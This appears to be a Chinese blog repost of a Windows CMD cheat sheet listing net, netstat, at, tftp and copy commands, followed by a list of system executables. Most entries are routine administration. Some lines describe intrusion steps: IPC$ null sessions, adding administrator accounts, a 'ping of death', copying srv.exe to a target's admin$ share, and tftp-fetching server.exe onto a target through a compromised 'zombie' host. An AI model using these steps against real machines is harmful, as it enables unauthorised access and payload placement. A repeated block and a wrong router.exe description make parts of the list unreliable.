zoukankan      html  css  js  c++  java
  • Windows 下 CMD 命令

    Windows 下 CMD 命令:

    net use \ipipc$ " " /user:" " 建立IPC空链接 
    net use \ipipc$ "密码" /user:"用户名" 建立IPC非空链接 
    net use h: \ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: 
    net use h: \ipc$ 登陆后映射对方C:到本地为H: 
    net use \ipipc$ /del 删除IPC链接 
    net use h: /del 删除映射对方到本地的为H:的映射 
    net user 用户名 密码 /add 建立用户 
    net user guest /active:yes 激活guest用户 
    net user 查看有哪些用户 
    net user 帐户名 查看帐户的属性 
    net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 
    net start 查看开启了哪些服务 
    net start 服务名 开启服务;(如:net start telnet, net start schedule) 
    net stop 服务名 停止某服务 
    net time \目标ip 查看对方时间 
    net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 
    net view 查看本地局域网内开启了哪些共享 
    net view \ip 查看对方局域网内开启了哪些共享 
    net config 显示系统网络设置 
    net logoff 断开连接的共享 
    net pause 服务名 暂停某服务 
    net send ip "文本信息" 向对方发信息 
    net ver 局域网内正在使用的网络连接类型和信息 
    net share 查看本地开启的共享 
    net share ipc$ 开启ipc$共享 
    net share ipc$ /del 删除ipc$共享 
    net share c$ /del 删除C:共享 
    net user guest 12345 用guest用户登陆后用将密码改为12345 
    net password 密码 更改系统登陆密码 
    netstat -a 查看开启了哪些端口,常用netstat -an 
    netstat -n 查看端口的网络连接情况,常用netstat -an 
    netstat -v 查看正在进行的工作 
    netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) 
    netstat -s 查看正在使用的所有协议使用情况 
    nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 
    tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 
    ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 
    ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 
    ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 
    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 
    kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 
    del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 
    
    #2 二: 
    
    del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) 
    move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 
    fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> ""> >" 是重定向命令 
    at id号 开启已注册的某个计划任务 
    at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 
    at id号 /delete 停止某个已注册的计划任务 
    at 查看所有的计划任务 
    at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 
    finger username @host 查看最近有哪些用户登陆 
    telnet ip 端口 远和登陆服务器,默认端口为23 
    open ip 连接到IP(属telnet登陆后的命令) 
    telnet 在本机上直接键入telnet 将进入本机的telnet 
    copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 
    copy c:srv.exe \ipadmin$ 复制本地c:srv.exe到对方的admin下 
    cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 
    copy \ipadmin$svv.exe c: 或:copy\ipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: 
    xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 
    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 
    tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机 
    ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) 
    route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface 
    arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 
    start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 
    mem 查看cpu使用情况 
    attrib 文件名(目录名) 查看某文件(目录)的属性 
    attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 
    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 
    date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 
    set 指定环境变量名称=要指派给变量的字符 设置环境变量 
    set 显示当前所有的环境变量 
    set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 
    pause 暂停批处理程序,并显示出:请按任意键继续.... 
    if 在批处理程序中执行条件处理(更多说明见if命令及变量) 
    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) 
    call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) 
    echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 
    echo 信息 在屏幕上显示出信息 
    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 
    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello 
    find 文件名 查找某文件 
    title 标题名字 更改CMD窗口标题名字 
    color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 
    prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky ) 
    
    #3 三: 
    
    ver 在DOS窗口下显示版本信息 
    winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) 
    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS 
    md 目录名 创建目录 
    replace 源文件 要替换文件的目录 替换文件 
    ren 原文件名 新文件名 重命名文件名 
    tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 
    type 文件名 显示文本文件的内容 
    more 文件名 逐屏显示输出文件 
    doskey 要锁定的命令=字符 
    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= 
    taskmgr 调出任务管理器 
    chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 
    tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 
    exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe 
    path 路径可执行文件的文件名 为可执行文件设置一个路径。 
    cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? 
    regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; 
    regedit /e 注册表文件名 导出注册表 
    cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:	est.txt /D pub 设定d:	est.txt拒绝pub用户访问。 
    cacls 文件名 查看文件的访问用户权限列表 
    REM 文本内容 在批处理文件中添加注解 
    netsh 查看或更改本地网络配置情况

    Windows 下在 CMD 中启动程序:

    gpedit.msc-----组策略 sndrec32-------录音机  
      Nslookup-------IP地址侦测器 explorer-------打开资源管理器  
      logoff---------注销命令 tsshutdn-------60秒倒计时关机命令  
      lusrmgr.msc----本机用户和组 services.msc---本地服务设置  
      oobe/msoobe /a----检查XP是否激活 notepad--------打开记事本  
      cleanmgr-------垃圾整理 net start messenger----开始信使服务  
      compmgmt.msc---计算机管理 net stop messenger-----停止信使服务  
      conf-----------启动netmeeting dvdplay--------DVD播放器  
      charmap--------启动字符映射表            diskmgmt.msc---磁盘管理实用程序  
      calc-----------启动计算器 dfrg.msc-------磁盘碎片整理程序  
      chkdsk.exe-----Chkdsk磁盘检查 devmgmt.msc--- 设备管理器  
      regsvr32 /u *.dll----停止dll文件运行 drwtsn32------ 系统医生  
      rononce -p ----15秒关机 dxdiag---------检查DirectX信息  
      regedt32-------注册表编辑器 Msconfig.exe---系统配置实用程序  
      rsop.msc-------组策略结果集 mem.exe--------显示内存使用情况  
      regedit.exe----注册表 winchat--------XP自带局域网聊天  
      progman--------程序管理器 winmsd---------系统信息  
      perfmon.msc----计算机性能监测程序 winver---------检查Windows版本  
      sfc /scannow-----扫描错误并复原 winipcfg-------IP配置  
      taskmgr-----任务管理器(2000/xp/2003) command--------cmd  
      fsmgmt.msc 共享文件夹 netstat -an----查看端口  
      osk 屏幕键盘 install.asp----修改注册网页  
      eventvwr.msc 时间查看器  
      secpol.msc 本地安全设置  
      services.msc 服务  
      2K  
      
      accwiz.exe > 辅助工具向导   
      acsetups.exe > acs setup dcom server executable   
      actmovie.exe > 直接显示安装工具   
      append.exe > 允许程序打开制定目录中的数据   
      arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表   
      at.exe > 计划运行任务   
      atmadm.exe > 调用管理器统计   
      attrib.exe > 显示和更改文件和文件夹属性   
      autochk.exe > 检测修复文件系统   
      autoconv.exe > 在启动过程中自动转化系统   
      autofmt.exe > 在启动过程中格式化进程   
      autolfn.exe > 使用长文件名格式   
      bootok.exe > boot acceptance application for registry   
      bootvrfy.exe > 通报启动成功   
      cacls.exe > 显示和编辑acl   
      calc.exe > 计算器   
      cdplayer.exe > cd播放器   
      change.exe > 与终端服务器相关的查询   
      charmap.exe > 字符映射表   
      chglogon.exe > 启动或停用会话记录   
      chgport.exe > 改变端口(终端服务)   
      chgusr.exe > 改变用户(终端服务)   
      chkdsk.exe > 磁盘检测程序   
      chkntfs.exe > 磁盘检测程序
      cidaemon.exe > 组成ci文档服务   
      cipher.exe > 在ntfs上显示或改变加密的文件或目录   
      cisvc.exe > 索引内容   
      ckcnv.exe > 变换cookie   
      cleanmgr.exe > 磁盘清理   
      cliconfg.exe > sql客户网络工具   
      clipbrd.exe > 剪贴簿查看器   
      clipsrv.exe > 运行clipboard服务   
      clspack.exe > 建立系统文件列表清单   
      cluster.exe > 显示域的集群   
      _cmd_.exe > 没什么好说的!   
      cmdl32.exe > 自动下载连接管理   
      cmmgr32.exe > 连接管理器   
      cmmon32.exe > 连接管理器监视   
      cmstp.exe > 连接管理器配置文件安装程序   
      comclust.exe > 集群   
      comp.exe > 比较两个文件和文件集的内容*   
      compact.exe > 显示或改变ntfs分区上文件的压缩状态   
      conime.exe > ime控制台   
      control.exe > 控制面板   
      convert.exe > 转换文件系统到ntfs   
      convlog.exe > 转换iis日志文件格式到ncsa格式   
      cprofile.exe > 转换显示模式   
      cscript.exe > 较本宿主版本   
      csrss.exe > 客户服务器runtime进程   
      csvde.exe > 日至格式转换程序   
      dbgtrace.exe > 和terminal server相关   
      dcomcnfg.exe > dcom配置属性   
      dcphelp.exe > ?   
      dcpromo.exe > ad安装向导   
      ddeshare.exe > dde共享   
      ddmprxy.exe >   
      debug.exe > 就是debug啦!   
      dfrgfat.exe > fat分区磁盘碎片整理程序   
      dfrgntfs.exe > ntfs分区磁盘碎片整理程序   
      dfs_cmd_.exe > 配置一个dfs树   
      dfsinit.exe > 分布式文件系统初始化   
      dfssvc.exe > 分布式文件系统服务器   
      diantz.exe > 制作cab文件   
      diskperf.exe > 磁盘性能计数器   
      dllhost.exe > 所有com+应用软件的主进程   
      dllhst3g.exe >   
      dmadmin.exe > 磁盘管理服务   
      dmremote.exe > 磁盘管理服务的一部分   
      dns.exe > dns applications dns   
      doskey.exe > 命令行创建宏   
      dosx.exe > dos扩展   
      dplaysvr.exe > 直接运行帮助   
      drwatson.exe > 华生医生错误检测   
      drwtsn32.exe > 华生医生显示和配置管理   
      dtcsetup.exe > installs mdtc   
      dvdplay.exe > dvd播放   
      dxdiag.exe > direct-x诊断工具   
      edlin.exe > 命令行的文本编辑器(历史悠久啊!)   
      edlin.exe > 命令行的文本编辑器(历史悠久啊!)   
      esentutl.exe > ms数据库工具   
      eudcedit.exe > type造字程序   
      eventvwr.exe > 事件查看器   
      evnt_cmd_.exe > event to trap translator; configuration tool   
      evntwin.exe > event to trap translator setup   
      exe2bin.exe > 转换exe文件到二进制   
      expand.exe > 解压缩   
      extrac32.exe > 解cab工具   
      fastopen.exe > 快速访问在内存中的硬盘文件   
      faxcover.exe > 传真封面编辑   
      faxqueue.exe > 显示传真队列   
      faxsend.exe > 发送传真向导   
      faxsvc.exe > 启动传真服务   
      fc.exe > 比较两个文件的不同   
      find.exe > 查找文件中的文本行   
      findstr.exe > 查找文件中的行   
      finger.exe > 一个用户并显示出统计结果   
      fixmapi.exe > 修复mapi文件   
      flattemp.exe > 允许或者禁用临时文件目录   
      fontview.exe > 显示字体文件中的字体   
      forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行   
      freecell.exe > popular windows game 空当接龙   
      ftp.exe > file transfer protocol used to transfer files over a network connection 就是ftp了   
      gdi.exe > graphic device interface 图形界面驱动   
      grovel.exe >   
      grpconv.exe > program manager group convertor 转换程序管理员组   
      help.exe > displays help for windows 2000 commands 显示帮助   
      hostname.exe > display hostname for machine. 显示机器的hostname   
      ie4uinit.exe > ie5 user install tool ie5用户安装工具   
      ieshwiz.exe > customize folder wizard 自定义文件夹向导   
      iexpress.exe > create and setup packages for install 穿件安装包   
      iisreset.exe > restart iis admin service 重启iis服务   
      internat.exe > keyboard language indicator applet 键盘语言指示器   
      ipconfig.exe > windows 2000 ip configuration. 察看ip配置   
      ipsecmon.exe > ip security monitor ip安全监视器   
      ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序   
      irftp.exe > setup ftp for wireless communication 无线连接   
      ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务   
      jdbgmgr.exe > microsoft debugger for java 4 java4的调试器   
      jetconv.exe > convert a jet engine database 转换jet engine数据库   
      jetpack.exe > compact jet database. 压缩jet数据库   
      jview.exe > command-line loader for java java的命令行装载者   
      krnl386.exe > core component for windows 2000 2000的核心组件   
      label.exe > change label for drives 改变驱动器的卷标   
      lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合向导   
      ldifde.exe > ldif cmd line manager ldif目录交换命令行管理   
      licmgr.exe > terminal server license manager 终端服务许可协议管理   
      lights.exe > display connection status lights 显示连接状况   
      llsmgr.exe > windows 2000 license manager 2000许可协议管理   
      llssrv.exe > start the license server 启动许可协议服务器   
      lnkstub.exe >   
      locator.exe > rpc locator 远程定位   
      lodctr.exe > load perfmon counters 调用性能计数   
      logoff.exe > log current user off. 注销用户   
      lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态,   
      显示被送到基于unix的服务器的打印任务   
      lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印   
      机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。
    
      lsass.exe > lsa executable and server dll 运行lsa和server的dll   
      lserver.exe > specifies the new dns domain for the default server 指定默认server新的dns域   
      os2.exe > an os/2 warp server (os2 /o) os/2   
      os2srv.exe > an os/2 warp server os/2   
      os2ss.exe > an os/2 warp server os/2   
      osk.exe > on screen keyboard 屏幕键盘   
      packager.exe > windows 2000 packager manager 对象包装程序   
      pathping.exe > combination of ping and tracert 包含ping和tracert的程序   
      pax.exe > is a posix program and path names used as arguments must be specif   
      ied in posix format. use "//c/users/default" instead of "c:usersdefault."   
      启动便携式存档互换 (pax) 实用程序   
      pentnt.exe > used to check the pentium for the floating point division error. 检查pentium的浮点错误   
      perfmon.exe > starts windows performance monitor 性能监视器   
      ping.exe > packet internet groper 验证与远程计算机的连接   
      posix.exe > used for backward compatibility with unix 用于兼容unix   
      print.exe > cmd line used to print files 打印文本文件或显示打印队列的内容。   
      progman.exe > program manager 程序管理器   
      proquota.exe > profile quota program   
      psxss.exe > posix subsystem application posix子系统应用程序   
      qappsrv.exe > displays the available application terminal servers on the net   
      work   
      在网络上显示终端服务器可用的程序   
      qprocess.exe > display information about processes local or remote 在本地或远程显示进程的信息(需终端服务)   
      query.exe > query termserver user process and sessions 查询进程和对话   
      quser.exe > display information about a user logged on 显示用户登陆的信息(需终端服务)   
      qwinsta.exe > display information about terminal sessions. 显示终端服务的信息   
      
      rasadmin.exe > start the remote access admin service 启动远程访问服务   
      rasautou.exe > creates a ras connection 建立一个ras连接   
      rasdial.exe > dial a connection 拨号连接   
      ras.exe > starts a ras connection 运行ras连接   
      rcp.exe > copies a file from and to a rcp service. 在 windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件   
      rdpclip.exe > rdpclip allows you to copy and paste files between a terminal   
      session and client console session. 再终端和本地复制和粘贴文件   
    recover.exe > recovers readable information from a bad or defective disk 从坏的或有缺陷的磁盘中恢复可读取的信息。   
      redir.exe > starts the redirector service 运行重定向服务   
      regedt32.exe > 32-bit register service 32位注册服务   
      regini.exe > modify registry permissions from within a script 用脚本修改注册许可   
      register.exe > register a program so it can have special execution character   
      istics. 注册包含特殊运行字符的程序   
      regsvc.exe >   
      regsvr32.exe > registers and unregister's dll's. as to how and where it regi   
      ster's them i dont know. 注册和反注册dll   
      regtrace.exe > options to tune debug options for applications failing to dum   
      p trace statements   
      trace 设置   
      regwiz.exe > registration wizard 注册向导   
      remrras.exe >   
      replace.exe > replace files 用源目录中的同名文件替换目标目录中的文件。   
      reset.exe > reset an active section 重置活动部分   
      rexec.exe > runs commands on remote hosts running the rexec service. 在运行rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 tcp/ip 协议后才可以使用该命令。   
      risetup.exe > starts the remote installation service wizard. 运行远程安装向导服务   
      route.exe > display or edit the current routing tables. 控制网络路由表   
      routemon.exe > no longer supported 不再支持了!   
      router.exe > router software that runs either on a dedicated dos or on an os. 检查pentium的浮点错误   
      perfmon.exe > starts windows performance monitor 性能监视器   
      ping.exe > packet internet groper 验证与远程计算机的连接   
      posix.exe > used for backward compatibility with unix 用于兼容unix   
      print.exe > cmd line used to print files 打印文本文件或显示打印队列的内容。   
      progman.exe > program manager 程序管理器   
      proquota.exe > profile quota program   
      psxss.exe > posix subsystem application posix子系统应用程序   
      qappsrv.exe > displays the available application terminal servers on the network   
      在网络上显示终端服务器可用的程序   
      qprocess.exe > display information about processes local or remote 在本地或远程显示进程的信息(需终端服务)   
      query.exe > query termserver user process and sessions 查询进程和对话   
      quser.exe > display information about a user logged on 显示用户登陆的信息(需终端服务)   
      qwinsta.exe > display information about terminal sessions. 显示终端服务的信息   
  • 相关阅读:
    HTTP处理程序介绍
    c# Enum获取name,value和description
    如何成为优秀的软件人才
    关于系统设计分层
    从DLL中加载启动窗体
    摩斯密码
    休息下
    关于博文转载
    整合TextBox与Label 创建新控件EFLabelText
    ProC连接Oracle
  • 原文地址:https://www.cnblogs.com/tinypeng/p/3432918.html
Copyright © 2011-2022 走看看